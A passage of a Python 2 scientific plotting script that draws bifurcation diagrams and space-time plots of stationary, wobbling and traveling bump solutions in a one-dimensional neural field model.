#edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = 500#edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+500
print end_idx
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.5, .7), xycoords='axes fraction', xytext=(1.2, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#
#########################################################################################
if subplots >= 3:
ax13 = plt.subplot(gs[2,-1])
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(c)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.2, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
"""
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
"""
ax23 = plt.subplot(gs[1,-1])
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax23.set_xlabel(r'$x$')
ax23.set_title(r"\textbf{(b)}",x=0.1)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax23.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax23.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax23.plot(modsolph[slc],timearr[slc],ls='--',lw=2,dashes=(5,2),color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax23.set_aspect('auto')
ax23.set_xlim(-pi,pi)
ax23.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax23.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax23.set_xticklabels(x_label)
ax1.annotate('', xy=(.9, .55), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
ax1.annotate('', xy=(.9, .42), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = 3700#-550
ax32 = plt.subplot(gs[-1,-2])
dat = oned_simple.SimDat(g=3.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax32.set_xlabel(r'$x$')
ax32.set_title(r"\textbf{(d)}",x=0.1)
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax32.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax32.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax32.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax32.set_aspect('auto')
ax32.set_xlim(-pi,pi)
ax32.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax32.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax32.set_xticklabels(x_label)
ax1.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 5:
"""
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
"""
sign = -1
shift = -950
ax31 = plt.subplot(gs[-1,-3])
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax31.set_xlabel(r'$x$')
ax31.set_title(r"\textbf{(e)}",x=0.1)
start_idx = len(dat.t)/2.
end_idx = int(1.3*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax31.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
fig.colorbar(cax)
ax31.xaxis.tick_bottom()
ax31.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
ax31.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax31.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax31.set_aspect('auto')
ax31.set_xlim(-pi,pi)
ax31.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax31.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax31.set_xticklabels(x_label)
ax1.annotate('', xy=(.3, .05), xycoords='axes fraction', xytext=(.05, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax1.legend(loc='upper left',fontsize=10)
ax1.set_xlabel(r'$\bm{g}$',size=15)
ax1.set_ylabel(r'$\bm{q}$',size=15)
ax1.set_xlim(1,5)
return fig
def draw_branches_twop(ax,filelist,namelist,colorlist,ls):
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
return ax
def oned_full_2par(subplots=1,with_numerics=True):
"""
1d domain, 2par bifurcation diagram of full system from auto
"""
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax1 = plt.subplot(gs[:2,:2])
"""
2 param bifurcation diagram from auto
"""
namelist = ['HB','LP 2']#['BP','HB','LP 2','LP 1']
colorlist = ['orange','purple']#['teal','orange','purple','black']
filelist = ['bif_full_a2_gq_hb.dat','bif_full_a2_gq_lp2.dat']#,'bif_full_gq_lp2.dat']#["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['--','-.','-', '--', '-.', ':']
ax1 = draw_branches_twop(ax1,filelist,namelist,colorlist,ls)
ax1.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax1.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
#ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax1.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
dat = oned_simple.SimDat(g=0.,q=0.,zshift=0,T=1000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(a)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = 100
print start_idx
#edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = 500#edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+500
print end_idx
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
pass
#ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
if False:
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.5, .7), xycoords='axes fraction', xytext=(1.2, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#
#########################################################################################
if subplots >= 3:
ax13 = plt.subplot(gs[2,-1])
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(c)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = dat.t[-1]/dat.dt
pad = 10
start_idx = np.argmin(np.mod(dat.ph_angle[total_time_idx/2:]+pi,2*pi)-pi)+total_time_idx/2+pad/2
print start_idx
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
pass
#ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
if False:
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print 'shifted oned const vel analytic by', 578, 'with dt=',dat.dt
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.2, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
ax23 = plt.subplot(gs[1,-1])
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax23.set_xlabel(r'$x$')
ax23.set_title(r"\textbf{(b)}",x=0.1)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax23.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
pass
#ax23.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax23.plot(modsolph[slc],timearr[slc],ls='--',lw=2,dashes=(5,2),color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax23.set_aspect('auto')
ax23.set_xlim(-pi,pi)
ax23.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax23.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax23.set_xticklabels(x_label)
ax1.annotate('', xy=(.9, .55), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.annotate('', xy=(.9, .42), xycoords='axes fraction', xytext=(1.2, .45),
# arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
sign = -1
shift = 3700#-550
ax32 = plt.subplot(gs[-1,-2])
dat = oned_simple.SimDat(g=3.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax32.set_xlabel(r'$x$')
ax32.set_title(r"\textbf{(d)}",x=0.1)
start_idx = len(dat.t)/2.
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax32.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
pass
#for slc in unlink_wrap(dat.ph_angle[idx]):
# ax32.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax32.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax32.set_aspect('auto')
ax32.set_xlim(-pi,pi)
ax32.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax32.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax32.set_xticklabels(x_label)
ax1.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 5:
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
sign = -1
shift = -950
ax31 = plt.subplot(gs[-1,-3])
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax31.set_xlabel(r'$x$')
ax31.set_title(r"\textbf{(e)}",x=0.1)
start_idx = len(dat.t)/2.
end_idx = int(1.3*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax31.matshow(np.roll(dat.sol[idx,:dat.N],dat.N/2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax31.xaxis.tick_bottom()
ax31.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
pass
#for slc in unlink_wrap(dat.ph_angle[idx]):
# ax31.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax31.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print 'shifted oned_nonconst_vel_bump ana by ', shift, 'where dt=',dat.dt
ax31.set_aspect('auto')
ax31.set_xlim(-pi,pi)
ax31.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax31.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax31.set_xticklabels(x_label)
ax1.annotate('', xy=(.3, .05), xycoords='axes fraction', xytext=(.05, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax1.legend(loc='upper left',fontsize=10)
ax1.set_xlabel(r'$\bm{g}$',size=15)
ax1.set_ylabel(r'$\bm{q}$',size=15)
ax1.set_xlim(1,5)
return fig
def draw_branches_twop(ax,filelist,namelist,colorlist,ls):
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print branchlist
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx*t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
ax.plot(clean(dat[:,0],dat[:,1])[0],clean(dat[:,0],dat[:,1])[1],
lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
return ax
def oned_full_auto():
"""
1d bifurcation diagram from auto
see numerical_bard_sep.ode
"""
filelista2 = ["bif_full_a2_q0.5_gvary1.dat","bif_full_a2_q0.5_gvary2.dat","bif_full_a2_q0.5_gvary2b.dat"]
filelista3 = ["bif_full_a3_q0.5_gvary1.dat","bif_full_a3_q0.5_gvary2.dat","bif_full_a3_q0.5_gvary2b.dat"]
# data files obtained using numerical_bard_sep.ode
fig = plt.figure(figsize=(10,5))
ax = plt.subplot2grid((2,2),(0,0))
ax = draw_branches(ax,filelista2)
# labels
ax.set_xticks([])
ax.set_ylabel(r'$\bm{a_1}$',size=15)
# set y axis ticks to multiples of pi
ax.set_ylim(-1.5,1)
ax.set_xlim(0,5)
ax.set_title(r'\textbf{(a)}',x=0,y=1.05)
#ax.legend(loc='lower left',fontsize=10)
"""
ax.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
"""
ax.annotate("HB",color='orange',
xy=(1.50704,0.78737), xycoords='data',
xytext=(.75, .5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
# LP 2 label inset
ax.annotate("LP 2",color='purple',
xy=(2.75, .796), xycoords='data',
xytext=(3.2, .4), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
"""
ax.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
"""
# inset
axins = inset_axes(ax,
width="30%", # width = 30% of parent_bbox
height="50%", # height : 1 inch
loc=3)
axins = draw_branches(axins,filelista2,smallscale=True)
axins.set_xlim(2.1,2.9)
axins.set_ylim(.78,.82)
# bistability for inset
axins.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
axins.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
# LP 2 label inset
axins.annotate("LP 2",color='purple',
xy=(2.81, .796), xycoords='data',
xytext=(2.68, .785), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
plt.tick_params(axis='both', which='both', bottom='off', top='off', labelbottom='off', right='off', left='off', labelleft='off')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
# mark bistability
ax.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
ax.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
ax2 = plt.subplot2grid((2,2),(1,0))
ax2.set_title(r'\textbf{(b)}',x=0,y=1.05)
ax2 = draw_branches(ax2,filelista3)
ax2.set_ylabel(r'$\bm{a_2}$',size=15)
ax2.set_xlabel(r'$\bm{g}$',size=15)
ax2.set_ylim(-1,.1)
ax2.set_xlim(0,5)
# inset
axins = inset_axes(ax2,
width="30%", # width = 30% of parent_bbox
height=1., # height : 1 inch
loc=1)
axins = draw_branches(axins,filelista3,smallscale=True)
axins.set_xlim(2.1,3.)
axins.set_ylim(-.83,-.73)
# inset bistability
axins.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
axins.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
# inset lp2
axins.annotate("LP 2",color='purple',
xy=(2.84, -.779), xycoords='data',
xytext=(2.7, -.75), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
plt.tick_params(axis='both', which='both', bottom='off', top='off', labelbottom='off', right='off', left='off', labelleft='off')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax2, axins, loc1=2, loc2=4, fc="none", ec="0.5")
"""
ax2.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
"""
